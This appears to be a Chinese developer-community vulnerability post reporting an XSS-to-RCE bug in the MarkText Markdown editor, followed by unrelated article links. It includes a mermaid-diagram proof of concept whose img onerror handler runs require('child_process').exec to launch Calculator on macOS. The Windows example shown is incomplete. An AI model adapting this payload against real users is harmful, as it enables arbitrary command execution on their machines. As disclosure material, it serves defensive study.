AI 助理
备案控制台
开发者社区 安全 文章 正文

marktext编辑器XSS触发RCE命令执行

2023-02-13 81
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: marktext编辑器XSS触发RCE命令执行

marktext编辑器XSS触发RCE命令执行

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

marktext编辑器XSS触发RCE命令执行

风险等级

高危

影响版本

marktext目前所有版本均受影响

资产确定

https://marktext.app/

漏洞验证

windows

sequenceDiagram
B ->> S: 1
hello ->> B:


**mac**

sequenceDiagram
 B ->> S: <img src=1 onerror="require('child_process').exec('open /System/Applications/Calculator.app')">
 hello ->> B:

修复方案

目前尚未修复

文章标签:
Windows
网络安全
安全
关键词:
编辑器命令
编辑器marktext
编辑器触发
ckcsec
目录
相关文章
泡沫o0
|
6月前
|
Shell Linux C语言
【Shell 命令集合 文本编辑器 】Linux pico 编辑器使用指南
【Shell 命令集合 文本编辑器 】Linux pico 编辑器使用指南
泡沫o0
103 1
黑夢
|
6月前
|
Linux 编译器 开发工具
Linux:详解(yum的使用、vim编辑器命令集合以及gcc/g++编译器的使用)
Linux:详解(yum的使用、vim编辑器命令集合以及gcc/g++编译器的使用)
黑夢
191 1
泡沫o0
|
6月前
|
存储 搜索推荐 Shell
【Shell 命令集合 文本编辑器】Linux joe 编辑器的使用教程
【Shell 命令集合 文本编辑器】Linux joe 编辑器的使用教程
泡沫o0
90 0
泡沫o0
|
6月前
|
Shell Linux C语言
【Shell 命令集合 文本编辑器】Linux jed 编辑器使用指南
【Shell 命令集合 文本编辑器】Linux jed 编辑器使用指南
泡沫o0
78 0
尘觉
|
6月前
|
Linux 程序员 Shell
Linux编辑器,开机重启,用户注销,用户管理 常用命令
Linux编辑器,开机重启,用户注销,用户管理 常用命令
尘觉
132 0
fensnote
|
6月前
vi编辑器替换字符串命令
vi编辑器替换字符串命令
fensnote
66 1
猫头虎
|
Linux Shell Go
《Linux操作系统编程》第四章 屏幕编程器vi : 了解屏幕编辑器vi的概述和基本操作命令
《Linux操作系统编程》第四章 屏幕编程器vi : 了解屏幕编辑器vi的概述和基本操作命令
猫头虎
91 0
monGyrate
|
3月前
|
开发工具
vim编辑器常用命令
vim编辑器常用命令
monGyrate
87 1
jcLee95
|
3月前
|
数据采集 运维 监控
运维笔记:流编辑器sed命令用法解析
运维笔记:流编辑器sed命令用法解析
jcLee95
57 5
土木林森
|
6月前
|
运维 自然语言处理 开发工具
【专栏】NeoVim正逐渐取代Vim成为运维人员首选的文本编辑器。这 8 个原因或许是答案,命令对比一目了然!
【4月更文挑战第28天】NeoVim正逐渐取代Vim成为运维人员首选的文本编辑器。其优势包括更好的扩展性、现代化界面、多语言编程支持、异步处理能力、协作功能、持续更新及活跃社区。NeoVim的命令与Vim相似,但在启动配置、插件管理和窗口管理等方面有所优化。总的来说,NeoVim提供了更强大、灵活和现代的编辑体验。
土木林森
598 0

热门文章

最新文章

  • 1
    CKEditor+SWFUpload实现功能较为强大的编辑器(一)---CKEditor配置
  • 2
    输入法编辑器(IME)程序设计(2)
  • 3
    xheditor编辑器上传功能实现
  • 4
    Linux之文本编辑器Vim
  • 5
    7.1 vim编辑器
  • 6
    AMIS【部署 01】amis前端低代码框架可视化编辑器amis-editor本地部署流程
  • 7
    Linux-vi编辑器开发必备操作
  • 8
    Vim编辑器的常用快捷键.
  • 9
    linux基础--vim编辑器
  • 10
    性能的极致,Rust的加持,Zed-Dev编辑器快速搭建Python3.10开发环境
  • 1
    Notepad-- 轻量级文本编辑器的安装及基本使用
    186
  • 2
    【vue】 Tinymce 富文本编辑器 不想让上传的图片转换成base64,而是链接
    286
  • 3
    【vue】 vue2 中使用 Tinymce 富文本编辑器
    560
  • 4
    【若依】 若依内置富文本框quill,editor居中无效
    802
  • 5
    【Git】Git提示Another git process seems to be running in this repository, e.g. an editor opened by ..错误
    85
  • 6
    为什么vim是程序员最喜欢的文本编辑器之一?
    62
  • 7
    XAF 属性编辑器(PropertyEditor)- 原理篇
    54
  • 8
    Docker部署Dillinger个人文本编辑器
    65
  • 9
    Nano 或 Vim:哪个是 Linux 上更好的文本编辑器?
    221
  • 10
    配置Linux固定IP地址,为什么要固定IP,因为他是通DHCP服务获取的,DHCP服务每次重启都会重新获取一次ip,VMware编辑中有一个虚拟网络编辑器
    75

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册

    • 相关实验场景

    更多
  • vi编辑器的学习和使用
  • 1分钟代码漏洞自动检测
    • 下一篇
    阿里云OSS设置跨域访问